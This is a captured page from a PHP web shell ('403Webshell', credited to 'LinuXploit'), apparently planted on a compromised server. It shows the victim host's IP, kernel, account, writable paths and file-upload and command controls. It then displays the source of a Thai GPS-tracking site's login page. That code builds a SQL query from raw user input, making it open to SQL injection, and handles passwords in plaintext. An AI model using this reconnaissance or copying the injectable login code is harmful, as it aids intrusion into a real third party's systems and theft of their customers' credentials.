403Webshell
Server IP : 103.233.193.20  /  Your IP : 216.73.216.169
Web Server : Apache/2
System : Linux host1.itclever.com 4.18.0-553.16.1.el8_10.x86_64 #1 SMP Thu Aug 8 17:47:08 UTC 2024 x86_64
User : oriscomadm ( 1120)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  /home/oriscomadm/domains/oriscom.com/private_html/m/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :

[ Back ]     

Current File : /home/oriscomadm/domains/oriscom.com/private_html/m/login_s1.php
<?php
session_start();
session_destroy();
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=2">
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>Oriscom GPS Online</title>
<link rel="stylesheet" href="css/server.css" type="text/css" charset="utf-8" />
<link rel="stylesheet" href="css/common.css" type="text/css" charset="utf-8" />
<style type="text/css">
<!--
body {
	background-color: #333333;
}
a:link {
	text-decoration: none;
}
a:visited {
	text-decoration: none;
}
a:hover {
	text-decoration: none;
}
a:active {
	text-decoration: none;
}
input[type=text] {
    width: 100%;
    box-sizing: border-box;
    border: 2px solid #ccc;
    border-radius: 4px;
    font-size: 16px;
    background-color: white;
    background-image: url('user.png');
    background-position: 5px 5px;
    background-repeat: no-repeat;
    padding: 6px 5px 10px 30px;
}
input[type=text1] {

    width: 100%;
    box-sizing: border-box;
    border: 2px solid #ccc;
    border-radius: 4px;
    font-size: 16px;
    background-color: white;
    background-image: url('pass.png');
    background-position: 5px 5px;
    background-repeat: no-repeat;
    padding: 6px 5px 10px 30px;
}
input[type=text]:focus {
    border: 3px solid #017cb7;
	background-color: lightblue;
}
input[type=text1]:focus {
    border: 3px solid #017cb7;
	background-color: lightblue;
}
</style>
<script type="text/javascript">
<!--
function MM_goToURL() { //v3.0
  var i, args=MM_goToURL.arguments; document.MM_returnValue = false;
  for (i=0; i<(args.length-1); i+=2) eval(args[i]+".location='"+args[i+1]+"'");
}
//-->

</script>

</head>

<body id="server">
<form id="form1" name="form1" method="post" action="list_car.php">
<input type="hidden" name="user1"  value="<?php echo $user; ?>"/>
<input type="hidden" name="password1" value="<?php echo $password; ?>"/>
</form>
<form id="login" name="login" method="post" action="login_s1.php?strSearch=Y">
  <div id="wrap_server">
    <div class="head"> <span class="logo"><a href="index.php"><img src="logo_mobile.png" border="0" /></a></span> <span class="title">ORISCOM GPS TRACKING SERVER</span> </div>
    <div class="box_server">
      <div class="border_box">
        <ul>
          <li><span class="button4">ลงชื่อเข้าสู่ระบบ SERVER1</span></li>
          <li> <span ><img src="who.png" /></span> </li>
          <li><span class="button3">
            <input type="text" name="user" id="user" />
          </span> </li>
          <li><span class="button3">
            <input type="text1" name="password" id="password" />
          </span></li>
          <?php
		    
			require_once('Connections/gpsonline_sv1.php');
			mysql_select_db($database_gpsonline_sv1, $gpsonline_sv1);
			$query_customer = "SELECT * FROM customer WHERE user_org like '$user' and pass_org like '$password'";
			$customer = mysql_query($query_customer, $gpsonline_sv1) or die(mysql_error());
			$row_customer = mysql_fetch_assoc($customer);
			$totalRows_customer = mysql_num_rows($customer);
			
			if($strSearch=="Y")
              {
				if ($totalRows_customer==1 && $user !="" && $password !="")
						{
						    echo "<li><a href='#'><span class='button1'>ยินดีต้อนรับเข้าสู่ระบบ1</span></a></li>";
							?>
                            <script>document.getElementById("form1").submit();</script>
                            <?php
							session_start();
							$_SESSION['sess_user'] = $user;
							$_SESSION['sess_pass'] = $password;
							$_SESSION['sess_cus_id'] = $row_customer['customer_id'];
						}
				else 
						{
							echo "<li><a href='#'><span class='button1'>กรุณาตรวจสอบ User และ Password อีกครั้ง</span></a></li>";
						}
				}
			else
			{
				//echo "<li><a href='#'><span class='button1'>กรุณาตรวจสอบ User และ Password อีกครั้ง</span></a></li>";
			}


		  ?>
          <li><span >
            <input type="submit" name="Submit" id="button" value="Login" class="button2"/>
          </span></li>
          <li><span >
            <input name="back" type="button" class="button2" id="back" onclick="MM_goToURL('parent','www.oriscom.php/m/index.php');return document.MM_returnValue" value="ย้อนกลับสู่เมนูหลัก"/>
          </span></li>
        </ul>
      </div>
    </div>
  </div>
</form>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit